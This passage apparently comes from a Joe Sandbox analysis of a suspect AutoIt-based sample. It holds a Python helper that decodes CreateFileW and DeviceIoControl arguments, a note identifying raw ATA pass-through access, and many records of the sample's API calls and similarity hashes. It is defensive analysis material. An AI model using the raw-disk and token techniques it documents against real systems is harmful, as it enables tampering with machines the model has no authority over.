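            d = decode_createfile(a[1] or 0, a[2] or 0, a[4] or 0, a[5] or 0)
            findings.append(
                f"{call['ref']}: CreateFileW access={'|'.join(d['access'])} "
                f"share={'|'.join(d['share'])} {d['disposition']} {'|'.join(d['flags'])}")
        elif call["api"] == "DeviceIoControl" and len(a) >= 2 and a[1] is not None:
            d = decode_ioctl(a[1])
            findings.append(
                f"{call['ref']}: DeviceIoControl {d['code']} = {d['name']} "
                f"({d['device_type']}, function 0x{d['function']:X}, {d['method']}, {d['access']})")
    return findings


# The four API lines of the record above, copied verbatim from the report.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00536733",
    "_memset.LIBCMT ref: 00536754",
    "DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005367A6",
    "CloseHandle.KERNEL32(00000000), ref: 005367AF",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

Run against the record, the helper reports the handle being opened with GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL, and the control code 0x0004D02C as IOCTL_ATA_PASS_THROUGH (device type FILE_DEVICE_CONTROLLER, function 0x40B, METHOD_BUFFERED, read and write access). That combination is the access pattern required for a raw controller or physical-drive handle, with a 0x200-byte buffer passed in each direction; the ATA command inside the buffer is not visible in the listing, so the code stops at naming the control code.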
                                                                                  APIs
                                                                                    • Part of subcall function 0052AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0052AA79
                                                                                    • Part of subcall function 0052AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0052AA83
                                                                                    • Part of subcall function 0052AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0052AA92
                                                                                    • Part of subcall function 0052AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0052AA99
                                                                                    • Part of subcall function 0052AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0052AAAF
                                                                                  • GetLengthSid.ADVAPI32(?,00000000,0052ADE4,?,?), ref: 0052B21B
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0052B227
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052B22E
                                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 0052B247
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                  • String ID:
                                                                                  • API String ID: 4217664535-0
                                                                                  • Opcode ID: b126b3ba542883814d285b1d11ac2b37dec0c208bab896729343d754d100f4b0
                                                                                  • Instruction ID: fbed3e2b0273baef5220aa6e464d624fe806805ba33dd5723abce2654a342703
                                                                                  • Opcode Fuzzy Hash: b126b3ba542883814d285b1d11ac2b37dec0c208bab896729343d754d100f4b0
                                                                                  • Instruction Fuzzy Hash: 5311C475A00215EFDB049F54ED44AAEBBB9FF96304F14802DE54697251D7319E44DB20
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0052B498
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4AA
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4C0
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0052B4DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 4f35d84227dc071af028662649af8fb24004985e4dd97f57934572eedb109825
                                                                                  • Instruction ID: e747ae3ac3daf148f15ed3572a7b5f508ffdad4332eb879f88e05f3080230d17
                                                                                  • Opcode Fuzzy Hash: 4f35d84227dc071af028662649af8fb24004985e4dd97f57934572eedb109825
                                                                                  • Instruction Fuzzy Hash: 5111367A900228BFEF11EBA8D885E9DBBB5FF09710F204091E604B7290D771AE10DB94
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0050B5A5
                                                                                  • GetClientRect.USER32(?,?), ref: 0056E69A
                                                                                  • GetCursorPos.USER32(?), ref: 0056E6A4
                                                                                  • ScreenToClient.USER32(?,?), ref: 0056E6AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4127811313-0
                                                                                  • Opcode ID: a07b50c0e5401ca05fd37e454e376cc6d452102e33e1816955ffa2c337baa68a
                                                                                  • Instruction ID: 7d445f49c4349074dc78bf2d7180699e323a629ca64b744b6c6181bc70c92942
                                                                                  • Opcode Fuzzy Hash: a07b50c0e5401ca05fd37e454e376cc6d452102e33e1816955ffa2c337baa68a
                                                                                  • Instruction Fuzzy Hash: EB113A3550042ABBDB10DF54DC8A8EE7BB8FF58305F100491E902E7180D734BA85DBB5
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00537352
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00537385
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0053739B
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005373A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2880819207-0
                                                                                  • Opcode ID: bacafe700697a5b7234cb77b83f72781298feab0784e4e931d339d9e454e0fa6
                                                                                  • Instruction ID: 56fef9bb6f04df13ad863be7d6e99195eac7b241e6eea39c603b1eac7bed09ba
                                                                                  • Opcode Fuzzy Hash: bacafe700697a5b7234cb77b83f72781298feab0784e4e931d339d9e454e0fa6
                                                                                  • Instruction Fuzzy Hash: FE1108B6A04208BFD7119BA8DC05A9E7FBDEF58310F044355F825E3261D6709D08B7B0
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                  • GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3970641297-0
                                                                                  • Opcode ID: d8c79bbd07e132d53028059356e2b43efe3e93ac2b58c1cc8f86cd7a0d0576be
                                                                                  • Instruction ID: 8ecbcf8b96bb06dbde07eaf7d66fbada645cc77e3d27a6f31bdf1a817a51ce06
                                                                                  • Opcode Fuzzy Hash: d8c79bbd07e132d53028059356e2b43efe3e93ac2b58c1cc8f86cd7a0d0576be
                                                                                  • Instruction Fuzzy Hash: 5211AD72101509BFEB024F909C55EEEBF79FF18364F040101FA1452090CB319CA0EBB0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                  • Instruction ID: 27302a4b20b5607121390af3943d57c29175356718bd215a8e21720bb73279f4
                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                  • Instruction Fuzzy Hash: D3014E3204015ABBDF125F84EC058EE3F26BF5A350B598455FA1859075D336CAB1AF82
                                                                                  APIs
                                                                                    • Part of subcall function 00517A0D: __getptd_noexit.LIBCMT ref: 00517A0E
                                                                                  • __lock.LIBCMT ref: 0051748F
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 005174AC
                                                                                  • _free.LIBCMT ref: 005174BF
                                                                                  • InterlockedIncrement.KERNEL32(015C4260), ref: 005174D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 2704283638-0
                                                                                  • Opcode ID: 16a4a4de32fed93fef7baaf06c7e259c4967d4b3ecc599a6043fc91dfe6f99d6
                                                                                  • Instruction ID: efd8860d4510172813c69b1c9642d6477b6161a673cb3b0e5afe1b0c388d3284
                                                                                  • Opcode Fuzzy Hash: 16a4a4de32fed93fef7baaf06c7e259c4967d4b3ecc599a6043fc91dfe6f99d6
                                                                                  • Instruction Fuzzy Hash: D901A13190961AABFF12AFA8A4097DDBF70BF49710F144405F81467680CB645DC0DFD2
                                                                                  APIs
                                                                                    • Part of subcall function 0050AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050AFF2
                                                                                    • Part of subcall function 0050AF83: BeginPath.GDI32(?), ref: 0050B009
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050B033
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0055EA8E
                                                                                  • LineTo.GDI32(00000000,?,?), ref: 0055EA9B
                                                                                  • EndPath.GDI32(00000000), ref: 0055EAAB
                                                                                  • StrokePath.GDI32(00000000), ref: 0055EAB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  • Opcode ID: 6ea428ba3a820c06d2c1b8eb8e5e50403d07f655096b80fa6b4f850cc4dacbf1
                                                                                  • Instruction ID: 3030f77b6ce10e574d71671c383f05938e15f157689cd5f16d650cdcade7b5c2
                                                                                  • Opcode Fuzzy Hash: 6ea428ba3a820c06d2c1b8eb8e5e50403d07f655096b80fa6b4f850cc4dacbf1
                                                                                  • Instruction Fuzzy Hash: 98F05432005655B7DB125FA4AC0EFCE3F396F25311F044201FE15650E187745699EBA9
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0052C84A
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C85D
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0052C864
                                                                                  • AttachThreadInput.USER32(00000000), ref: 0052C86B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: 7542ef6e7195644988ad1d6027fd6f17498eac4c1e7003e5fbaa7026e9b723cb
                                                                                  • Instruction ID: 52062102157263f460f0884ba2cc4369bcde62b191bbc0d9bda910e9be294634
                                                                                  • Opcode Fuzzy Hash: 7542ef6e7195644988ad1d6027fd6f17498eac4c1e7003e5fbaa7026e9b723cb
                                                                                  • Instruction Fuzzy Hash: 17E0C0715412247ADB105B62AC0DEDB7F7CEF167A1F408025B50D95491C6718585E7F0
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0052B0D6
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0052AC9D), ref: 0052B0DD
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0052AC9D), ref: 0052B0EA
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0052AC9D), ref: 0052B0F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  • Opcode ID: afba28116763aef4ef71d89aa42d7af9e4c504e03b503bf1697d42cf62228402
                                                                                  • Instruction ID: 8688115b197944cc7feab2ca9ba3029857e3c955371e0e716df63997b50753e5
                                                                                  • Opcode Fuzzy Hash: afba28116763aef4ef71d89aa42d7af9e4c504e03b503bf1697d42cf62228402
                                                                                  • Instruction Fuzzy Hash: 88E086726012219BE7205FB17C0CB5B3BB8FF66791F018818F645D6080EB348485E770
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 0050B496
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0050B4A0
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0050B4B5
                                                                                  • GetStockObject.GDI32(00000005), ref: 0050B4BD
                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0056DE2B
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0056DE38
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0056DE51
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0056DE6A
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0056DE8A
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056DE95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1946975507-0
                                                                                  • Opcode ID: 83f8ae847d758888ad237ad69c8cdd4ac84dc720599ab51efc8a0e5d19f692da
                                                                                  • Instruction ID: 90afe4fc0b26d6af1f28db608d6e04390b37bc5035c3090b95fbfcf40023738e
                                                                                  • Opcode Fuzzy Hash: 83f8ae847d758888ad237ad69c8cdd4ac84dc720599ab51efc8a0e5d19f692da
                                                                                  • Instruction Fuzzy Hash: 1CE0ED31600240ABEF216F74BC49BD83F31AF61335F14C666FA79580E1C7724985EB21
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0052B2DF
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 0052B2EB
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052B2F4
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052B2FC
                                                                                    • Part of subcall function 0052AB24: GetProcessHeap.KERNEL32(00000000,?,0052A848), ref: 0052AB2B
                                                                                    • Part of subcall function 0052AB24: HeapFree.KERNEL32(00000000), ref: 0052AB32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 00a1a336fbc1f8d2ffc68551f105a38956ee16e06e08044fd84c7e6ae3cdcd72
                                                                                  • Instruction ID: 5fc6381986aa3e1f6dffb8086f68eceb4151272b7228146e40b4e32b792d18cc
                                                                                  • Opcode Fuzzy Hash: 00a1a336fbc1f8d2ffc68551f105a38956ee16e06e08044fd84c7e6ae3cdcd72
                                                                                  • Instruction Fuzzy Hash: BCE02F3A104405BBDB016B95FC08859FF76FF993213108621F61981575DB3298B5FB61
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: e350c3457510ac49e5ca414c66c9f20e35af4305b3bdca0dbbe21fa17b94b6f2
                                                                                  • Instruction ID: 722d010b20a01ab90d05df7619b6192ee3504767ab783f57feea0e9bdf1163ce
                                                                                  • Opcode Fuzzy Hash: e350c3457510ac49e5ca414c66c9f20e35af4305b3bdca0dbbe21fa17b94b6f2
                                                                                  • Instruction Fuzzy Hash: 55E01AB5100204EFEB005F70A84CA2D7FB4FF5C350F118805F85E87250DB749884AB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: 22404435327287697dac327ce435e30697518899aaf4744744b2749d1fe25cc0
                                                                                  • Instruction ID: c53153e4474990b0bf7c8b248eca02939fe9123b332bb629ebfe72d697d0dab8
                                                                                  • Opcode Fuzzy Hash: 22404435327287697dac327ce435e30697518899aaf4744744b2749d1fe25cc0
                                                                                  • Instruction Fuzzy Hash: 9EE012B1500200AFDB005F70A84CA2DBBB8FF5C350F118809F95E8B250DA79A884AB60
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0052DEAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContainedObject
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 3565006973-3941886329
                                                                                  • Opcode ID: e0c9dda5f73d66b02a7efd821d0a1ee38ce0013cd4fe83ae21fadc4a2331188d
                                                                                  • Instruction ID: 5cfd5d2fa21ac4dc7f87e3cee82f5eb2343ab46f9e9940929041f644f396726f
                                                                                  • Opcode Fuzzy Hash: e0c9dda5f73d66b02a7efd821d0a1ee38ce0013cd4fe83ae21fadc4a2331188d
                                                                                  • Instruction Fuzzy Hash: AE913970600611AFDB24CF64D889F6ABBF9BF4A710F10846DF94ACB691DB70E841CB60
                                                                                  APIs
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • __wcsnicmp.LIBCMT ref: 0053DEFD
                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0053DFC6
                                                                                  Strings
